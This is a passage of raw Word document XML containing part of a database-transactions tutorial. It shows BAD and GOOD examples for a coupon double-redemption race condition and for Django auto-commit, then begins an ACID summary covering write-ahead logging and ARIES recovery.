    <w:p w14:paraId="707F9C89" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA51433" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      log.error("Unexpected error", error=e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04E009" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813AE9C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="761E5B61" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Anti-pattern 4: SELECT then INSERT in separate statements without locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A487BC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="13F7F591" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>BAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A946CFB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # Check if coupon is available (can be used only once)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B25A098" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  usage = db.query("SELECT uses FROM coupons WHERE code = %s", [code]).scalar()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E9EAB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  if usage &gt;= 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369C97C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      raise CouponAlreadyUsed()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6358D5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53EBD4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # GAP: two concurrent requests both get usage=0, both proceed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508ACEA6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78269DB4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  db.execute("INSERT INTO coupon_redemptions (code, user_id) VALUES (%s, %s)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7CF5B4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">             [code, user_id])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EAE935" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  db.execute("UPDATE coupons SET uses = uses + 1 WHERE code = %s", [code])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0188F8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  db.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F06F74" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF09B6A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Result: coupon used twice (two insertions into coupon_redemptions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B872F64" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="7C31C8CB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>GOOD (use FOR UPDATE + unique constraint):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1202A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  with db.transaction():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696BAE04" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      coupon = db.query(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFC996" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          "SELECT uses, max_uses FROM coupons WHERE code = %s FOR UPDATE",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E55C2F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          [code]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E1EA3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      ).fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBA2976" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD549F7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      if coupon.uses &gt;= coupon.max_uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483681D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          raise CouponExhausted()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E0325" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660B576A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C256775" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          db.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FED596" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              "INSERT INTO coupon_redemptions (code, user_id) VALUES (%s, %s)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854AC6A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">              [code, user_id]  # UNIQUE(code, user_id) prevents double redemption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73673EF0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6749F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      except UniqueViolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614E648" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          raise AlreadyRedeemedError()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD32EEC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBFA9D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      db.execute("UPDATE coupons SET uses = uses + 1 WHERE code = %s", [code])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A1BA5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # FOR UPDATE ensures serialized access to coupon row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D537523" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="65C1A4A4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t>Anti-pattern 5: Relying on application-level transaction management without understanding the scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D61B1E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="40DB2B2F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>BAD (Django ORM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33148962" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # This does NOT use a single transaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7503D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  order = Order.objects.create(user=user, total=100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE139F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # COMMIT (Django auto-commits each query by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F437DF8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4490AC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  order_item = OrderItem.objects.create(order=order, product=product, quantity=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706F00CE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7ED55F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC8523" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  product.quantity -= 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C71A6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  product.save()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1840B04B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # COMMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B7EF90" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6E2847" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # If second or third statement fails: order exists but no items or stock not decremented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BF1C6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # Three separate transactions, not one atomic operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45472BCB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="5667F60B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>GOOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56E207" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  from django.db import transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A252C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E0E1ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  @transaction.atomic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E480BE0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  def create_order(user, product, quantity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC74DA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      order = Order.objects.create(user=user, total=product.price * quantity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BBF5D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      OrderItem.objects.create(order=order, product=product, quantity=quantity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F892967" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C062D5C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      # Atomic update with check (SELECT FOR UPDATE equivalent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406ED33" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      updated = Product.objects.filter(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6A202" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          id=product.id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741F074" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          quantity__gte=quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B28827" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      ).update(quantity=F('quantity') - quantity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E1D3B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69542AD6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      if not updated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC3BBE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          raise InsufficientStock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CC65B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA28532" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      return order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCBDD6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  # All three operations in one transaction, atomically committed or rolled back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B7915" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:pict w14:anchorId="30EFAA9C">
          <v:rect id="_x0000_i6777" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810F943" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3768FC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC39018" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>ACID = The formal contract a database makes about transaction behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7BCF00" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Four properties that together make the database a reliable abstraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0E428" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       over concurrent access and hardware failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD8C00" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="06F0C20E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Atomicity — The All-or-Nothing Guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5155B2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  What: transaction operations are indivisible — complete or not at all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145179DD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  How: Write-Ahead Log (WAL) records every change before applying it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BCD1DA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       ARIES: Analysis → Redo → Undo on crash recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB6560" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Undo log: before-images enable rollback of uncommitted transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FCCACC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">       Redo log: after-images enable replay of committed transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FCD36C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59478B82" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BFD9B0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    WAL: sequential log → fast writes → crash recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EF825" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Savepoints: partial rollback without aborting entire transaction</w:t>
      </w:r>
    </w:p>
